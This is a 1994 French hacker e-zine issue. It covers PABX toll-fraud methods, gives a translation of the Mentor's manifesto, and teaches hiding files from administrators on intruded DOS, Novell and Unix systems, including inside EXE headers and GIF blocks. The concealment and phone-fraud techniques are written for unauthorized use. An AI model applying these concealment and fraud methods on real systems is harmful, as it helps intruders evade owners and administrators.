-
- Piratage physique des lignes.
- a) methode simple et a peu de frais. Possibilité de se connecter sur
- tous les points du cheminement de la sortie du central au point
- final d'implantation du poste.
- b) Dans le cas d'un raccordement numérique du PABX, il ne sera pas
- possible de se raccorder sur le cheminement du central à la société.
- Un piratage de ce type necessite un equipement d'un cout tres
- dissuasif.
- La partie sensible se situe donc entre le PABX et la prise murale ou
- est connecté le poste analogique. Le pirratage ne pourra etre fait
- qu'a L'INTERIEUR de l'immeuble.
- c) Dans le cas d'une liaison numérique de bout en bout, le piratage à
- peu de frais deviens impossible [Ah ouais? t'veux une contre preuve?]
-
-
- B) Piratage des fonctionnalités du PABX
- Nous avons ici deux types de piratage possible:
- * volontaire avec les fonctionnalités disponible dans le PABX.
- * involontaire : affectation des taxes a un autre poste que le sien
- sans l'avoir voulu.
- Il s'agit le plus souvent de mauvais parametrage lors de la
- programmation ou des erreurs dans le logiciel lors de sa conception.
-
- Exemple concret lié à un bug:
- si l'initiateur d'unee conference avec deux correspondant exterieurs
- raccroche en premier, question:
- - est ce que les deux autres personnes seront coupées
- - Si la réponse est non qui sera taxe?
- Idem dans le cas d'un appel transféré vers l'exterieur.
-
- Les fonctionnalités concernées sont:
- * conference: verifier si les corresp. st coupés qd l'initiateur
- raccroche
- * transfert : lors des transferts interne, verifier si la repartition
- des taxes s'effectue correctement.
- * renvoi: avec un MIC T2 grand confort, il est possible de renvoyer les
- communication vers l'exterieur.
- * recuperation des fonctionnalité d'un poste de direction par un code
- et son mot de passe. Cette fonction permet a partir de n'importe quel
- poste de la société de récupérer le 19 en affectant le ticket de
- taxation au poste directeur.
-
- C) Piratage par telemaintenance.
- [ce qui suit est ma description des schemas:
- Fonction de télémaintenance:
- * Controle de qualité d'une ligne : permet d'appeler n'importe quel
- numéro.
- * Programmation d'un poste fantome puis renvoi. ]
- a) il est possible d'appeler un PABX et de se faire rappeler
- simultanement. Le but est de contrôler l'établissement de la
- liaison et de mesurer sa qualité:
- - en affaiblissement
- - en paradiaphonie
- - en reverberation
- Au lieu de se faire rappeler sur le site de contrôle, un
- technicien peut en profiter pour appeler un correspondant à
- l'étranger ou des serveurs minitel.
- Les taxes seront donc affecté au site controlé!
- b) Il est possible par telemaintenance de déclarer par programmation un
- poste dit fantome dans un PABX distant.
- Il existe dans la machine mais il n'est physiquement pas présent sur
- le site.
-
- D) Piratage d'un auxiliaire d'un PABX.
- Ce type de piratage est possible par le biais des options installées
- sur un autocommutateur téléphonique.
- Sont concernés:
- * serveurs vocaux
- * messageries vocales
- * les opérateurs automatiques
-
- Moyen de protection: Sur incident, appel non abouti il est souhaitable
- de réorienter les appels vers la standardiste. Cette précaution
- empêche un correspondant exterieur de surnuméroter pour rappeler un
- autre poste à travers le PABX.
-
- E) Piratage par une base TSF.
- [ bof, je tape pas ca:
- On passe dans les couloirs de la société avec un téléphone sans fil
- et on essaye d'accrocher une base ! ]
-
- 5°)
- A) acces aux locaux:
- [ resumé: - salle PABX fermée
- - acces controlés
- - que des techniciens habilités.
- - mm ch pr la salle d'exploit.
- - gaines techniques fermees
- - cabine de sous repartition controlée et surveillée
- - chemins de cable visibles cerclés et couverts!
- B) protec des infos.
- Enfermé dans des armoires:
- - derniere programmation
- - support annuaire technique
- - la composition des tetes PTT
- - la composition du systeme ne doit pas etre divulgué surtout si des
- auxiliaires sont raccordés derriere le PABX.
-
- Attention:
- Les microordinateurs envoyés en réparation, peuvent contenir des
- informations sensibles:
- - annuaire technique complet
- - annuaire extern
- - liste des numéros abrégés
- - liste des techniciens habilités.
- - liste des mots de passe
- - la taxation contenant tous les numéros appelés.
-
- C) Destruction des supports obsolete:
- [ en bref, on passe tout au broyeur et DELETE et FORMAT ne sont pas
- effectifs ! ]
-
- D) Sauvegarde
-
- 6°) Les moyens de contrôle:
- A) La taxation telephonique:
- [ schéma montrant une imprimante connectée au modem de maintenance du
- PABX avec consoles d'observ du trafic, de taxation et console systeme PABX
- ainsi qu'une messagerie vocale.
- ]
- Doit permettre un controle sur une periode paramétrable pour les appels
- émis par poste, service, direction.
- * a l'etranger
- * en province
- * en local
-
- B) Observ. du trafic:
- permet de reperer les lignes modem du PABX appelées en dehors des
- heures ouvrables.
- [ ***CONCLUSION*** ***IMPORTANTE*** DONC :
- SCANNEZ LA NUIT MAIS ------> *** UTILISEZ LE JOUR *** ]
- Tres utile en cas de piratage du PABX pour determiner les faisceaux
- utilisés pour entrer et ressortir a travers le PABX et ses auxiliaires.
-
- Afin de faciliter ce repérage, il est possible d'extraire les appels
- ressortantss dans la meme minute que les appels quii arrivent sur le
- PABX.
- Cette possibilité facilite grandement l'analyse si des temporisations
- n'ont pas été programées.
-
- Les tickets des appels émis par un PABX et non compris par le PC
- d'observation de trafic doivent etre stockés pour traitement ultérieur.
-
- Ne pas oublier que la puissance de traitement d'un systeme périphérique de
- taxation ou d'observation téléphonique est liée à la richesse des
- informations délivrées par le PABX d'un constructeur.
-
- Exemple: si le PABX n'a que des compteurs pour les emissions et les
- receptions d'appels, il sera impossible de faire un horodatage et de
- determiner les heures de pointes.
-
- --
- Fin de la première partie
- --
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.5
-
-
- \/\La Conscience d'un hacker/\/
-
- par
-
- +++The Mentor+++
-
- Ecrit le 8 Janvier 1986
-
- Traduit par NeurAlien le 8 septembre 1994.
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
- Un autre s'est fait prendre aujourd'hui, c'est partout dans les
- journaux. "Scandale: Un adolescent arreté pour crime informatique",
- "Arrestation d'un 'hacker' après le piratage d'une banque"...
- Satanés gosses, tous les mêmes.
-
- Mais avez vous, dans votre psychologie en trois piece et votre profil
- technocratique de 1950, un jour pensé à regarder le monde derriere les yeux
- d'un hacker? Ne vous etes vous jamais demandé ce qui l'avait fait agir,
- quelles forces l'avaient modelé?
- Je suis un hacker, entrez dans mon monde...
- Le mien est un monde qui commence avec l'école... Je suis plus
- astucieux que la pluspart des autres enfants, les conneries qu'ils m'apprennent
- me lassent...
-
- Je suis au collège ou au lycée. J'ai écouté les professeurs expliquer
- pour la quizieme fois comment réduire une fraction. Je l'ai compris.
- "Non Mme Dubois, je ne peux pas montrer mon travail. Je l'ai fait dans ma tête"
- Satané gosses. Il l'a certainnement copié. Tous les mêmes.
-
- J'ai fait une découverte aujourd'hui. J'ai trouvé un ordinateur.
- Attends une minute, c'est cool. Ca fait ce que je veux. Si ca fait une
- erreur, c'est parce que je me suis planté.
- Pas parce qu'il ne m'aime pas...
- Ni parce qu'il se sent menacé par moi...
- Ni parce qu'il pense que je suis petit filoux...
- Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas être là...
- Satanés gosses. Tout ce qu'il fait c'est jouer. Tous les mêmes.
-
- Et alors c'est arrivé... une porte s'est ouverte sur le monde... Se
- précipitant a travers la ligne téléphonique comme de l'héroine dans les veines
- d'un accro, une impulsion electronique est envoyée, on recherche un refuge à
- l'incompetence quotidienne... un serveur est trouvé.
-
- Vous vous repetez que nous sommes tous pareils... On a été nourri à la
- petite cuillere de bouffe pour bébé à l'école quand on avait faim d'un steak...
- Les fragments de viande que l'on nous a laissé étaient pré-machés et sans gout.
- On a été dominé par des sadiques ou ignoré par des apathiques. Les seuls qui
- avaient des choses à nous apprendre trouvèrent des élèves volontaires, mais
- ceux ci sont comme des gouttes dans le desert.
-
- C'est notre monde maintenant... Le monde de l'éléctron et de
- l'interrupteur, la beauté du baud. Nous utilisons un service déja existant,
- sans payer ce qui pourrait être bon marché si ce n'était pas la propriété
- de gloutons profiteurs, et vous nous appelez criminels. Nous explorons... et
- vous nous appelez criminels. Nous recherchons la connaissance... et vous nous
- appelez criminels. Nous existons sans couleur de peau, sans nationalité, sans
- dogme religieux... et vous nous appelez criminels.
- Vous construisez des bombes atomiques, vous financez les guerres,
- vous ne punissez pas les patrons de la mafia aux riches avocats,
- vous assassinez et trichez, vous manipulez et nous mentez en essayant de nous
- faire croire que c'est pour notre propre bien être, et nous sommes encore des
- criminels.
-
- Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon
- crime est celui de juger les gens par ce qu'ils pensent et dise, pas selon leur
- apparence.
- Mon crime est de vous surpasser, quelque chose que vous ne me pardonnerez
- jamais.
-
- Je suis un hacker, et ceci est mon manifeste. Vous pouvez arreter cet
- individu, mais vous ne pouvez pas tous nous arreter...
- après tout, nous sommes tous les mêmes.
-
- +++The Mentor+++
-
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.6
-
- ╔════════════════════════════════╗
- ║ Data dissimulation techniques: ║
- ║ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ║
- ║ Hiding your data in ║
- ║ a Restricted and Patrolled ║
- ║ District of CyberSpace. ║
- ║ ------------------------------ ║
- ║ Written by Arscene ║
- ║ for N0Way ║
- ╚════════════════════════════════╝
-
- I) Intro & Thanks & Disclaimer
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Dans la, heum, discipline, qui est la notre il arrive souvent que
- nous ayions a dissimuler une certaine quantité de Data sur un
- systeme que nous visitions, ou qui possede des resources auquelles
- nous n'avons pas access, et generalement dont il ne profite pas
- pleinement. Il nous arrive aussi d'avoir a communiquer dans un
- environnement peu sur et controlé par des individus paranoiaques et
- megalomanes. C'est pour ces deux raisons que j'ai ecrit ce file.
- Il s'adresse a tous, et j'espere qu'il vous sera utile (Que j'ai
- pas passé des nuits blanches pour rien, quoi).
- Remerciements/greets/good_karma a NeurAlien, Omega et O'Connell
- pour etre qui ils sont.
- GreetZ a tous les lecteurs de N0Way. N'oubliez pas que l'avenir;
- c'est vous. Et que vous etes defini par vos actions, et non votre
- passé.
- This file also dedicated to Mr Toubon for his open mindedness and
- his efforts towards harmonious internationalisation. Also to Mr
- Pasqua for his efforts to preserve peace at all cost and his
- unswaying belief in the principles of democracy, justice, and
- freedom.
- Bon, je suis sur que NeurAlien vas nous faire une superbe
- Disclaimer qui couvre tout, mais j'aimerais rajouter la mienne:
-
- De ce texte complet, je n'ais ecrit et pensé que ces trois lignes.
- Dans ces trois lignes, une et une seule est un mensonge.
- Avant-hier, j'ai pensé voir un OVNI.
-
- Faites moi du mail sur ce que vous pensez de ce Disclaimer, et vos
- idées pour faire mieux.
-
- II) Cacher un file dans le OS
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Bon, d'abord les principes de base. Si vous etes sur un systeme 'étranger'
- (dont vous n'avez pas le controle complet), il arrive que vous vouliez
- posseder quelques files (fichiers), sans que les autres users, ou meme le
- Supervisor, ne le sache. Il faut donc les cacher.
-
- 1) Les attributs de systeme:
-
- La, on pense tout de suite aux attributs speciaux de fichiers (Caché ou
- Systeme, sous MS-DOS). Mais, si ces attributs font partie du systeme ils
- sont tres connus, et bon nombre de programmes peuvent les modifier, ou les
- ignorent tout simplement. Ils servent en general a proteger l'utilisateur
- de lui meme, en evitant par exemple qu'il n'efface des fichiers systemes.
- Par exemple: Crééz un fichier DOS puis faites soit ATTRIB +H ou ATTRIB +S
- dessus, et allez dans le file manager de Windows (Vous ne l'utilisez peut
- etre pas souvent, mais le proprietaire de systeme si). Allez sur le
- drive/dir ou est votre fichier caché. Normalement vous ne le voyez pas.
- Vous ne pouvez pas non plus l'effacer.
- Maintenant allez dans Affichage/Par type de fichiers. Cliquez sur
- 'Visualiser les fichiers systemes/cachés'. En revenant a l'ecran principal
- vous devriez voir votre fichier, mais en plus il aura un point
- d'exclamation rouge a coté de son nom, et il n'est plus tres discret
- maintenant.
- De meme, si vous avez LapLink 3 (recommandé), vous avez surement remarqué
- qu'il affiche les fichiers normaux en gris-DOS standard, mais les fichiers
- cachés ou systemes sont affichés en Blanc (High intensity) avec un '*'
- devant leur nom. Ideal pour se faire reperer.
-
- 2) Le choix:
-
- Les attributs du systeme peuvent donc soit bien dissimuler le fichier,
- soit le rendre tres evident. Il y a donc un choix a faire. Pensez vous que
- la/les personnes a qui vous voulez dissimuler le fichier seront assez
- intelligentes pour cliquer sur le bouton ? (C'est une vraie question, pas
- une question rhetorique). La reponse par default, dans mon cas, est Oui. Je
- prefere ne pas cacher mes files et utiliser d'autres options.
-
- 3) Tout en haut de l'arbre:
-
- Comme un object caché dans un arbre, un file caché profond en haut de
- l'arbre est plus dur a reperer que si vous le laissiez dans la racine. En
- regle generale il ne faut rien mettre dans la racine, et preferer au moins
- 2 niveaux de profondeure. Voici un exemple:
- Pour une raison qui m'est propre je devais charger un TSR sur une PC en
- reseau Novell. Il fallait une ligne dans l'autoexec, et un endroit ou
- mettre le fichier sur le disque dur. Cette machine etait frequement utilisé
- par le SUPERVISOR (on se demande ce que faisait le TSR, hum ;-)) et
- l'AUTOEXEC.BAT lançait un antivirus resident qui scannait la racine
- de C: au demarage. Les noms des fichiers sur C:\ s'affichant
- pendant le scan. J'ai donc mis le fichier dans C:\DOS. Ainsi il
- n'etait pas remarqué par le scan, et la ligne dans l'autoexec ne
- paraissait pas suspecte car l'autoexec.bat sert justement a charger
- des programmes du repertoire DOS. Cet exemple me permet d'ajouter
- qu'il faut toujours essayer de placer un fichier parmi ses
- semblables, du moins exterieurement (j'y reviendrait en 4).
-
- Un autre exemple: J'avais un fichier de +4Mo a dissimuler sur un poste en
- local, le temps que je puisse amener de quoi le backup et le ramener chez
- moi. Je l'ai mis dans C:\EXCEL\EXEMPLES\AUTRE, il y a de cela au moins 6
- mois. A dernière verification il y etait encore. Peu de gens s'aventurent
- haut dans un arbre, surtout s'il parait conforme. Une petite note quand
- meme: N'en faites pas trop. Il ne faut pas que le chemin soit sensiblement
- plus long que la moyenne sur le disque, car un backup ou un TREE pourrait
- le reperer aisement.
- Pour clore cette partie il me faut reserver une mention speciale a nos
- amis de chez M$, et plus particulierement le repertoire WINDOWS\SYSTEM.
- Celui-ci existe sur la grande majorité des machines, peut etre meme la
- votre. Combien d'entre vous savent combien de fichiers ils ont dans ce
- repertoire, et ce que fait chaque fichier ? En gros, on peut TOUT fourrer
- dans ce repertoire, si ce n'est ni trop gros ni trop voyant. Personne ne
- s'en rendra compte.
-
- 4) "A rose by any other name would smell as sweet"
-
- Pour ceux qui n'auraient pas compris ma citation de Shakespeare, Juliet
- dit qu'une rose, meme si on changait son nom, aurait quand meme la (bonne)
- odeure d'une rose. Mais un file ne sent pas, d'ou l'interet de changer son
- nom pour le dissimuler (Logique suspecte).
- Un nom qui fasse temporaire ( *.$$$, ~*.TMP, etc) est assez bon pour une
- courte periode, mais un sys/user intelligent risque de l'effacer au bout
- d'un moment. Un nom inventé est bon, de preference un nom qui ne soit pas
- comprehensible, de sorte a faire fichier systeme. Explication: En general
- un user va essayer de lire un file du nom README.NOW, il lira probablement
- le file WHATEVER.TXT, peut etre pas WHATEVER.DAT et surement pas PR4)Q567
- sans extension.
- Un nom de ce type est bon, mais ce n'est pas ce qui se fait de mieux. Le
- nom devrait s'integrer a son environnement. Regardez se qui existe deja
- dans les alentours. Par exemple j'ai mis deux fichiers (HACK et VIEW pour
- ceux que cela interresse) dans le ROOT d'un drive ou il existait MENU1.OLD
- et MENU2.OLD. Simplement en les appelent MENU3.OLD et MENU4.OLD ils sont
- restes 'invisibles' pendant plus d'un mois (puis je les ais enlevé).
- CONFIG.OLD (ou .CPS ou .B~K) et la meme chose pour AUTOEXEC font de bon
- depos temporaires. Pour une plus longue echeance essayer TD451.DRV dans
- \WINDOWS\SYSTEM ou un truc du genre.
-
- 5) Conclusion (de part I)
-
- Petite conclusion rapide. Les trois regles d'or pour planquer un file
- sont:
- - Le mettre ou en utilisation normale un user ne le verait meme pas.
- - Que son nom s'integre a son environnement.
- - Choisir un nom/extension que l'user ne penserait pas, en marche normale
- a lire/ouvrir/lancer/etc.
- Et en, heu, regle d'argent:
- - Autant que possible, le crypter.
-
- 6) PS et PPS
-
- PS: Si vous cryptez le file il ne faut PAS que cela soit apparent, par
- exemple PGP met '----- BEGIN PGP MESSAGE -----' (ou un truc du
- genre) au debut de ce qu'il crypte. Si un sys/user voit cela il
- risque fort de le delete immediatement.
-
- PPS: Dans la serie Revenge/Annoy si vous voulez simplement irriter le
- sys/user dans ce cas faites tout le contraire de ce que dit ce file. Un
- fichier de 8Mo du nom de SECRET.COD, OCCULT.SEX, VIRUS.XXX dans le ROOT,
- completement crypté (du garbage au hasard) avec en premiere ligne 'JF-DES
- Crypted block. Checksum: 834A4C12' risque grandement d'amuser un sys/user,
- surtout si il en retrouve des variantes subtiles partout sur son disque :-)
-
- III) Cacher un file dans un autre
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Une technique encore plus subtile, et de par la meme meilleure, est de
- cacher un file directement dans un autre. Le file 'host' devrait etre un
- fichier anodin, qui a droit de residence legitime sur le systeme. Cela peut
- permettre de dissimuler encore plus efficacement un file sur un systeme,
- mais egalement (et probablement encore plus important) est que cette
- technique permet de créer un chemin sur entre 2 personnes a travers une
- zone non-sure du CyberSpace. Exemple: Dans les interets de la securité
- nationale et du peuple, un gouvernement debonnaire a rendu l'echange
- d'informations cryptés illégales. Non respet de cette loi vous
- fera deporté en Antarctique. Mais, CyberPunk que vous etes, vous
- devez envoyer vos C0deZ a quelqu'un. Vous ecrivez votre message,
- le cryptez. Puis vous digitalisez une photo de votre maison,
- inserez votre file dans la photo (en remplaçant le gresillement
- (l'aglomeration urbaine derrière chez vous en low-res) du fond par
- votre file crypté), puis vous U/L le tout a votre ami. Ce que je
- viens de decrire est fiction, mais montre un peu les possibilités
- de cette technique, qui commence d'ailleurs a faire du bruit
- (Remarquez l'allusion).
- [ OUh ouh Arscene, ce n'est plus Fiction !!! Cypherella des cypherpunks l'a
- fait sur Mac deja et j'ai eu des echos comme quoi la meme chose existe sur PC
- et Unix pour intégrer du code PGP a du JPEG et du GIF. ++NeurAlien]
-
- 1) Un peu de pratique
-
- Voici quelque endroits, sur PC, ou un file pourrait etre caché:
-
- - Dans un TXT: Un fichier TXT se finit par un CR, LF (qui font aller a la
- ligne) et un marqueur de fin de fichier. En Hex, cela donne 0D 0A 1A.
- Ajoutez ces 3 bytes a la fin d'un fichier TXT, puis ajoutez du text après,
- et ni TYPE ni EDIT n'afficheront ce nouveau text. Voici en detail:
-
- COPY CON FIRST.TXT
- >Essai de text XXX^Z
- (1 fichier ecrit)
- [Editez ce fichier et remplacez les 3 X respectivement par 0D, 0A et 1A]
- COPY CON TWO.TXT
- >Text secret^Z
- (1 fichier ecrit)
- COPY FIRST.TXT + TWO.TXT /b FINAL.TXT
- TYPE FINAL.TXT
- Essai de text
-
- Si vous ouvrez a nouveau FINAL.TXT dans votre editeur Hex vous verrez les
- 2 lignes. Cette technique n'est pas terrible en pratique (car un bon
- editeur ASCII ou traitement de texte fera apparaitre tout le texte) mais
- sert bien de demonstration
-
- - Dans un EXE: Tout EXE commence par un header d'une longeure variable de
- bytes, et avec l'utilisation rependue de compresseurs d'EXE le seul vrai
- moyen de voir si un header est valide est de lancer l'EXE. Pour inclure ce
- que vous voulez dans le header il suffit d'allonger sa taille. Cette taille
- s'exprime en paragraphes (16 bytes = 1 pararaph), est un WORD et ce trouve
- au 5ème WORD du fichier (10ème et 11ème byte). Après avoir ajouté la
- longeure de votre fichier / 16 ( + un peu pour etre sur ) au header il
- suffit d'inclure votre fichier a la fin de ce header. L'EXE devrait
- toujours fonctionner sans probleme. Si vous compez automatiser l'operation,
- il est bon d'inclure aussi la longeure du fichier en bytes et l'ancienne
- longueure du header.
-
- - Dans un GIF: Un GIF est formé de plusieures blocs. Un bloc commence par
- soit par un ',', (une virgule quoi), si c'est une image, par ';' si c'est
- la fin du fichier (bon, ok, c'est pas vraiment un bloc), ou par '!' si
- c'est une extension. La, cela devient interressant. Une extension peut
- etre n'importe quoi, un commentaire par exemple, en general un
- viewer de GIF reconnait certaines extension, et ignore tout simplement les
- valeures qu'il ne connait pas. D'ou l'idée de se faire un bloc 'Secret
- info'.
- Bon, comme aucun d'entre vous ne paye sa comm pour D/L N0Way, je peut sans
- crainte vous balancer ces extraits des DOC officielles:
- La première concerne les extensions GIF en general:
-
- GIF Extension Blocks are packaged in a manner similar to that used
- by the raster data though not compressed. The basic structure is:
- 7 6 5 4 3 2 1 0 Byte #
- +---------------+
- |0 0 1 0 0 0 0 1| 1 '!' - GIF Extension Block Introducer
- +---------------+
- | function code | 2 Extension function code (0 to 255)
- +---------------+ ---+
- | byte count | |
- +---------------+ |
- : : +-- Repeated as many times as necessary
- |func data bytes| |
- : : |
- +---------------+ ---+
- . . . . . .
- +---------------+
- |0 0 0 0 0 0 0 0| zero byte count (terminates block)
- +---------------+
- A GIF Extension Block may immediately preceed any Image Descriptor
- or occur before the GIF Terminator.
- All GIF decoders must be able to recognize the existence of GIF
- Extension Blocks and read past them if unable to process the function
- code.
-
- La seconde concerne le bloc d'extension particulier qui nous
- interresse:
-
- 26. Application Extension.
-
- a. Description. The Application Extension contains application-specific
- information; it conforms with the extension block syntax, as described
- below, and its block label is 0xFF.
-
- b. Required Version. 89a.
-
- c. Syntax.
-
- 7 6 5 4 3 2 1 0 Field Name Type
- +---------------+
- 0 | | Extension Introducer ['!'] Byte
- +---------------+
- 1 | | Extension Label [0xFF] Byte
- +---------------+
- +---------------+
- 0 | | Block Size [11] Byte
- +---------------+
- 1 | |
- +- -+
- 2 | |
- +- -+
- 3 | | Application Identifier 8 Bytes
- +- -+
- 4 | |
- +- -+
- 5 | |
- +- -+
- 6 | |
- +- -+
- 7 | |
- +- -+
- 8 | |
- +---------------+
- 9 | |
- +- -+
- 10 | | Appl. Authentication Code 3 Bytes
- +- -+
- 11 | |
- +---------------+
-
- +===============+
- | |
- | | Application Data Data Sub-blocks
- | |
- | |
- +===============+
-
- +---------------+
- 0 | | Block Terminator Byte
- +---------------+
-
- i) Extension Introducer - Defines this block as an extension. This
- field contains the fixed value 0x21 ['!' en ASCII].
-
- ii) Application Extension Label - Identifies the block as an
- Application Extension. This field contains the fixed value 0xFF.
-
- iii) Block Size - Number of bytes in this extension block,
- following the Block Size field, up to but not including the
- beginning of the Application Data. This field contains the fixed
- value 11.
-
- iv) Application Identifier - Sequence of eight printable ASCII
- characters used to identify the application owning the Application
- Extension.
-
- v) Application Authentication Code - Sequence of three bytes used
- to authenticate the Application Identifier. An Application program
- may use an algorithm to compute a binary code that uniquely
- identifies it as the application owning the Application Extension.
-
-
- d. Extensions and Scope. This block does not have scope. This block
- cannot be modified by any extension.
-
- e. Recommendation. None.
-
- Bon, j'espere que tout le monde a compris :-)
- Ce qu'il faut faire devient plus clair:
- Trouvez un endroit ou mettre notre bloc, par exemple la fin du
- fichier ( seek(file, -1, SEEK_END); en C. La fin d'un GIF est
- marqué par un ';' ). Il suffit d'y inserer un '!', le code disant
- que ceci est une Application Extension (0xFF), le numero 11, puis
- votre ID specifique (Sur Compu$serve en forum PICS il y a une liste
- rassemblent tous le Application ID deja utilisés, liste geré par
- Larry Wood). Puis vous mettez votre code de 3 bytes, sorte de
- signature pour verifier que ce n'est pas un faux bloc, puis
- finalement vous balancez votre file, sans trop vous soucier de la
- compression (qui selon la doc doit etre RLE), car de toute façon il
- sera decodé par un soft maison, et pas par le viewer de GIF.
- Verifiez quand meme qu'aucun byte ne vaut 0, car ce byte marque la
- fin du bloc. Voila, une methode discrete et aisé. Merci
- Compu$serve.
-
- 2) Finalement...
- Au fait, j'ai traité certaines methodes, et j'espere que vous
- pensez deja a d'autres (elles sont illimités). Mais, je n'ais pas
- parlé de celle mentionné dans l'intro, du Crypted text dans du
- graphic. Ben, heu, a vous de la faire :-) Serieusement j'etudie la
- question, et j'ai vu certains programmes sur BBS qui pretendait
- faire exactement cela. Peut-etre un article ulterieure (enfin,
- j'ai dit peut-etre)...
-
- X) Bon, ben la le file est fini. J'espere que vous avez apprecié,
- car ce fut interessant a ecrire. En cas ou vous auriez deja
- oublié, me llamo Arscene, et je prends data/info/mail/insultes/louanges/
- demandes_en_marriage/pots_de_vin/prix_pulitzer/etc en bal Arscene sur
- The 0NE, le RTC EFZ, ou sur A-D. Si besoin, voici ma clé:
-
- -----BEGIN PGP PUBLIC KEY BLOCK-----
- Version: 2.3a
-
- mQCNAi501fkAAAEEAMJm9gMhAGYaOnjYFzTVWxAX17rDX4tUjRG7wD6u5BgyOWFL
- gtyx3p8NQJCtjZOuRGOvSRFdm0l/fYY3qWbaXFOSRAY516ihc0OZurYaTROoIk3u
- /PuCUC9cHJmnFX6LpHj8MUtEpk1A19dM5UYmKQekDcSavCPv/xRorln5z03NAAUR
- tAdBcnNjZW5l
- =IosC
- -----END PGP PUBLIC KEY BLOCK-----
- Contactez moi en BAL avant de m'envoyer quelque chose de
- confidentiel pour verifier que vous avez bien ma VRAIE clé.
- ---------------------------------------------------------------------
-
- -%!% N0 Way %!%-
-
- Volume I, Numéro 3, Partie 3.7
-
-
- w____OO____w
-
- Playing hide 'n' seek in CyberSpace
-
- by ++NeurAlien
-
- /\/OO\/\
-
- Hey, je recois a l'instant l'article tres kewl d'Arscene et je me dis
- "Helluvabitch... wud B kewl 2 make de zame dingz 4 yunixzz zyztemz !"
- (ce qui veut dire Mr Allg00d :
- "ta mere en Slip bleu devant le Prisu' chausse du 2 !" Ouhahaha )
-
- Alors, voila, je vais vous montrer comment jouer au gros chien avec son
- admin de systeme Unix en lui cachant des trucs n'importe ou. Ceci est
- utilisable sans programme spéciaux ni quoi: vous avez juste a connaitre la
- métthode. Et ensuite je vais vous montrer comment vous amuser enormement avec
- les nerfs des admins de serveurs FTP sur le reseau Internet par le biais des
- Incomings directories.
-
- Ce N-Phile est dedicace tout specialement à Arscene qui s'applique
- toujours à nous fournir des articles qui relevent le niveau de N0 Way...
- (Ca va plaire, la distribution de NW 3 est assurée à grande échelle cette fois
- ci ! :))
- Je tiens a remercier aussi les quelques personnes qui m'ont enseignées
- l'art du hacking sous Unix, le Department of Defense aux USA sans lequel je
- n'aurais jamais eu acces a l'Internet (ni vous d'ailleur), les chiens dans la
- rue pour m'avoir souvent permis de me défouler, les "experts en sécurité" pour
- m'avoir souvent fait rire et enfin la brasserie Valstar SA pour m'avoir souvent
- dépanné ;))
-
- Ou est ce que je me planque en local?
- ====================================
- Well... Sous Unix c'est pas comme sous DOS, les attributs Caches et
- systemes, hum, yen a pas trop. Par contre unix a un gros avantage:
- il accepte BEAUCOUP BEAUCOUP de caracteres dans ses noms de fichier.
- Par exemple, il accepte les espaces dans ses noms de fichier.
- Ainsi on peut facilement dissimuler créer des fichier qui seront difficilement
- accessibles.
-
- On peut créer un fichier "sale admin" par exemple mais bon, ca se remarque !
- Exemple 1:
- ======> Script started on Thu Sep 15 02:16:15 1994
- DaubeNet-tmp {101} ls -al
- total 2
- drwx------ 2 fred emprunte 512 Sep 15 02:16 .
- drwx------ 11 fred emprunte 512 Sep 15 02:16 ..
- -rw------- 1 fred emprunte 0 Sep 15 02:16 ex1
- DaubeNet-tmp {102} cat >"sale admin"
- Haha, gros nain, tu sais meme pas effacer un fichier pfff....
- ^D
- DaubeNet-tmp {103} exit
- ======> Script done on Thu Sep 15 02:17:36 1994
-
- Alors la, l'admin quand il se pointe il voie:
- ======> Script started on Thu Sep 15 02:19:04 1994
- DaubeNet-tmp {101} ls -al
- total 3
- drwx------ 2 fred emprunte 512 Sep 15 02:17 .
- drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
- -rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
- DaubeNet-tmp {102} exit
- ======> Script done on Thu Sep 15 02:19:18 1994
-
- Ehehe, voila... Et la l'admin il aura beau tenter:
- ======> Script started on Thu Sep 15 02:19:22 1994
- root# ls -al
- total 3
- drwx------ 2 fred emprunte 512 Sep 15 02:17 .
- drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
- -rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
- root# rm sale admin
- rm: sale: No such file or directory.
- rm: admin: No such file or directory.
- root# echo ARghhhhhh
- ARghhhhhh
- root# exit
- ======> Script done on Thu Sep 15 02:19:45 1994
-
- Bref, pour l'effacer, en fait tout ce qu'il suffit de faire c'est:
- ======> Script started on Thu Sep 15 02:20:57 1994
- DaubeNet-tmp {101} ls -al
- total 3
- drwx------ 2 fred emprunte 512 Sep 15 02:17 .
- drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
- -rw------- 1 fred emprunte 62 Sep 15 02:17 sale admin
- DaubeNet-tmp {102} rm "sale admin"
- DaubeNet-tmp {103} ls -al
- total 2
- drwx------ 2 fred emprunte 512 Sep 15 02:21 .
- drwx------ 12 fred emprunte 512 Sep 15 02:17 ..
- DaubeNet-tmp {104} exit
- ======> Script done on Thu Sep 15 02:21:11 1994
-
-
- Ca c'est marrant pour faire un peu chier l'admin mais quand vous voulez
- reellement planquer des trucs, il faut la jouer plus fine. Si par exemple
- root.axs et milnet.dialup sont tres importants pour vous et que vous empruntez
- le login de quelqu'un, vous pouvez les cacher tres simplement.
- Exemple 2:
-
- ======> Script started on Thu Sep 15 02:25:11 1994
-
- DaubeNet-fred {101} ls -al
- total 46
- drwx------ 12 fred emprunte 512 Sep 15 02:24 .
- drwxrwxr-x 5 root wheel 512 Sep 9 12:03 ..
- -rwx------ 1 fred emprunte 655 Sep 3 1993 .Xmodmaprc
- -rwx------ 1 fred emprunte 8331 Sep 3 1993 .Xresources
- -rwx------ 1 fred emprunte 653 Jul 4 15:21 .cshrc
- drwx------ 2 fred emprunte 512 Jun 12 22:31 .elm
- -rw------- 1 fred emprunte 2229 Jul 4 17:45 .history
- -rwx------ 1 fred emprunte 207 Sep 3 1993 .login
- -rwx------ 1 fred emprunte 105 Sep 3 1993 .mailrc
